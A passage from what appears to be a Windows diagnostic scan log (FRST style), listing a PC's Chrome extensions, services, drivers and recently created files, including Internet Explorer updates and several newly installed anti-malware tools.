Data\Default\Extensions\mkhilblbmkdnapffblmecglknalglfji [2013-07-22] CHR Extension: (Google Wallet) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22] CHR StartMenuInternet: Google Chrome - C:\Users\Jack\AppData\Local\Google\Chrome\Application\chrome.exe ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 ABBYY.Licensing.FineReader.Sprint.9.0; C:\Program Files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [759048 2009-05-14] (ABBYY) R2 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.) S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [68096 2011-05-01] () [File not signed] R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [46808 2013-08-30] (AVAST Software) R2 avast! Firewall; C:\Program Files\AVAST Software\Avast\afwServ.exe [137960 2013-08-30] (AVAST Software) R2 Diskeeper; C:\Program Files\Condusiv Technologies\Diskeeper\DkService.exe [2721656 2012-07-27] (Condusiv Technologies) R2 MSSQL$UPSWSDBSERVER; C:\UPS\WSTD\MSSQL.1\MSSQL\Binn\sqlservr.exe [29263712 2008-11-24] (Microsoft Corporation) R2 ppped; C:\Program Files (x86)\CyberPower PowerPanel Personal Edition\ppped.exe [868352 2009-05-27] (Cyber Power Systems, Inc.) [File not signed] R2 vsmon; C:\Program Files (x86)\CheckPoint\ZoneAlarm\vsmon.exe [3592120 2014-04-25] (Check Point Software Technologies Ltd.) R2 wampapache; c:\wamp\bin\apache\apache2.0.63\bin\Apache.exe [20541 2008-01-17] (Apache Software Foundation) [File not signed] R3 wampmysqld; c:\wamp\bin\mysql\mysql5.5.8\bin\mysqld.exe [8133120 2010-12-31] () [File not signed] S4 ZAPrivacyService; C:\Program Files (x86)\CheckPoint\ZoneAlarm\ZAPrivacyService.exe [92176 2014-04-09] (Check Point Software Technologies, Ltd.) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 aswFsBlk; C:\Windows\System32\Drivers\aswFsBlk.sys [33400 2013-08-30] (AVAST Software) R1 aswFW; C:\Windows\System32\Drivers\aswFW.sys [131232 2013-08-30] (AVAST Software) R0 aswKbd; C:\Windows\System32\Drivers\aswKbd.sys [22600 2013-08-30] (AVAST Software) R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [80816 2013-08-30] (AVAST Software) R0 aswNdis; C:\Windows\System32\DRIVERS\aswNdis.sys [12368 2013-03-06] (ALWIL Software) R0 aswNdis2; C:\Windows\System32\Drivers\aswNdis2.sys [270824 2013-08-30] (AVAST Software) R1 aswRdr; C:\Windows\System32\Drivers\aswrdr2.sys [72016 2013-08-30] (AVAST Software) R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65336 2013-08-30] () R1 aswSnx; C:\Windows\System32\Drivers\aswSnx.sys [1030952 2013-08-30] (AVAST Software) R1 aswSP; C:\Windows\System32\Drivers\aswSP.sys [378944 2013-08-30] (AVAST Software) R1 aswTdi; C:\Windows\System32\Drivers\aswTdi.sys [64288 2013-08-30] (AVAST Software) R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [204880 2013-08-30] () R0 DKDFM; C:\Windows\System32\drivers\DKDFM.sys [40752 2012-04-05] (Condusiv Technologies) R3 DKRtWrt; C:\Windows\System32\DRIVERS\DKRtWrt.sys [52048 2012-06-18] (Condusiv Technologies) R0 DKTLFSMF; C:\Windows\System32\drivers\DKTLFSMF.sys [106832 2012-07-09] (Condusiv Technologies) S3 hcw85cir; C:\Windows\system32\drivers\hcw85cir3.sys [32768 2009-09-11] (Hauppauge Computer Works, Inc.) R3 mio; C:\Windows\System32\DRIVERS\mio.sys [14928 2010-10-13] (Dell/Alienware) S4 Mpsnt0; No ImagePath R0 SI3132; C:\Windows\System32\DRIVERS\SI3132.sys [90664 2009-07-29] (Silicon Image, Inc) R0 SiFilter; C:\Windows\System32\DRIVERS\SiWinAcc.sys [22056 2009-07-29] (Silicon Image, Inc) R0 SiRemFil; C:\Windows\System32\DRIVERS\SiRemFil.sys [17448 2009-07-29] (Silicon Image, Inc) R0 tib; C:\Windows\System32\DRIVERS\tib.sys [1120032 2013-04-13] (Acronis International GmbH) R0 tib_mounter; C:\Windows\System32\DRIVERS\tib_mounter.sys [183224 2013-04-13] (Acronis) U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [37624 2014-10-26] () R0 vidsflt; C:\Windows\System32\DRIVERS\vidsflt.sys [117024 2013-04-13] (Acronis International GmbH) R1 Vsdatant; C:\Windows\System32\DRIVERS\vsdatant.sys [450968 2014-04-24] (Check Point Software Technologies Ltd.) S3 PCDSRVC{0FF99CEB-15C9CE9E-06020200}_0; \??\c:\program files\alienautopsy\pcdsrvc_x64.pkms [X] U3 wampapache64; No ImagePath ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-10-26 21:42 - 2014-10-26 21:42 - 00000358 _____ () C:\Windows\PFRO.log 2014-10-26 21:37 - 2014-10-26 21:37 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb 2014-10-26 21:37 - 2014-10-26 21:37 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb 2014-10-26 21:37 - 2014-10-26 21:37 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl 2014-10-26 21:37 - 2014-10-26 21:37 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl 2014-10-26 21:37 - 2014-10-26 21:37 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00942592 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00774144 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00645120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsIntl.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00616104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dat 2014-10-26 21:37 - 2014-10-26 21:37 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat 2014-10-26 21:37 - 2014-10-26 21:37 - 00610304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00413696 _____ (Microsoft Corporation) C:\Windows\system32\html.iec 2014-10-26 21:37 - 2014-10-26 21:37 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec 2014-10-26 21:37 - 2014-10-26 21:37 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00247808 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\url.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00233472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00208384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00194048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\elshyph.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00182272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msls31.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00167424 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00151552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iexpress.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00139264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wextract.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00131072 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00127488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00111616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\IEAdvpack.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00105984 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00101376 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inseng.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx 2014-10-26 21:37 - 2014-10-26 21:37 - 00074240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SetIEInstalledDate.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardie.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdc.ocx 2014-10-26 21:37 - 2014-10-26 21:37 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00056832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pngfilt.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmler.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imgutil.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\licmgr10.dll 2014-10-26 21:37 - 2014-10-26 21:37 - 00013824 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00013312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe 2014-10-26 21:37 - 2014-10-26 21:37 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll 2014-10-26 21:35 - 2014-10-26 21:39 - 00008662 _____ () C:\Windows\IE11_main.log 2014-10-26 21:10 - 2014-10-26 21:10 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-10-26 21:08 - 2014-10-26 22:20 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-10-26 21:08 - 2014-10-26 21:10 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-10-26 21:08 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-10-26 21:08 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-10-26 20:05 - 2014-10-26 20:05 - 00004608 _____ () C:\Users\Jack\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini 2014-10-26 13:52 - 2014-10-26 13:52 - 00001112 _____ () C:\Users\Public\Desktop\Picasa 3.lnk 2014-10-26 13:51 - 2014-10-26 13:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picasa 3 2014-10-25 23:21 - 2014-10-26 13:19 - 00037624 _____ () C:\Windows\system32\Drivers\TrueSight.sys 2014-10-25 23:21 - 2014-10-25 23:21 - 00000000 ____D () C:\ProgramData\RogueKiller 2014-10-25 23:10 - 2014-10-25 23:10 - 00003201 _____ () C:\Users\Jack\Desktop\Sophos Virus Removal Tool.lnk 2014-10-25 23:10 - 2014-10-25 23:10 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sophos 2014-10-25 23:10 - 2014-10-25 23:10 - 00000000 ____D () C:\ProgramData\Sophos 2014-10-25 23:10 - 2014-10-25 23:10 - 00000000 ____D () C:\Program Files (x86)\Sophos 2014-10-25 22:52 - 2014-10-25 22:52 - 355172608 _____ () C:\Windows\MEMORY.DMP 2014-10-25 22:52 - 2014-10-25 22:52 - 00262392 _____ () C:\Windows\Minidump\102514-51776-01.dmp 2014-10-25 22:24 - 2014-10-26 12:24 - 00000000 ____D () C:\NPE 2014-10-25 22:18 - 2014-10-26 12:30 - 00000000 ____D () C:\Users\Jack\AppData\Local\NPE 2014-10-25 21:56 - 2014-10-25 21:56 - 32809520 _____ (IObit ) C:\Users\Jack\Downloads\IObit-Malware-Fighter-Setup.exe 2014-10-25 09:01 - 2013-12-24 19:09 - 01987584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10warp.dll 2014-10-25 09:01 - 2013-12-24 18:48 - 02565120 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll 2014-10-25 09:01 - 2013-11-26 04:16 - 03419136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1.dll 2014-10-25 09:01 - 2013-11-22 18:48 - 03928064 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 02776576 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 02284544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 01682432 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 01643520 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 01424384 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 01247744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 01238528 _____ (Microsoft Corporation) C:\Windows\system32\d3d10.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 01230336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 01175552 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 01158144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsPrint.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 01080832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00648192 _____ (Microsoft Corporation) C:\Windows\system32\d3d10level9.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00604160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10level9.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00522752 _____ (Microsoft Corporation) C:\Windows\system32\XpsGdiConverter.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00465920 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00417792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPhoto.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00364544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\XpsGdiConverter.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00363008 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00333312 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1core.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\d3d10core.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00293376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00249856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10_1core.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00245248 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecsExt.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00220160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10core.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00207872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecsExt.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00194560 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00187392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAnimation.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00161792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10_1.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00010752 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00010752 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00009728 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00009728 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00005632 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00005632 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-ole32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-user32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00002560 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-downlevel-normaliz-l1-1-0.dll 2014-10-25 08:46 - 2014-10-25 08:46 - 00002560 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll 2014-10-25 08:45 - 2014-10-25 08:50 - 00008540 _____ () C:\Windows\IE10_main.log 2014-10-24 20:30 - 2014-10-26 21:42 - 00000672 _____ () C:\Windows\setupact.log 2014-10-24 20:30 - 2014-10-24 20:30 - 00000000 _____ () C:\Windows\setuperr.log 2014-10-23 10:47 - 2014-10-23 10:47 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieUserList 2014-10-23 10:47 - 2014-10-23 10:47 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieSiteList 2014-10-23 10:31 - 2014-09-26 18:42 - 00098216 _____ (Oracle Corporation) 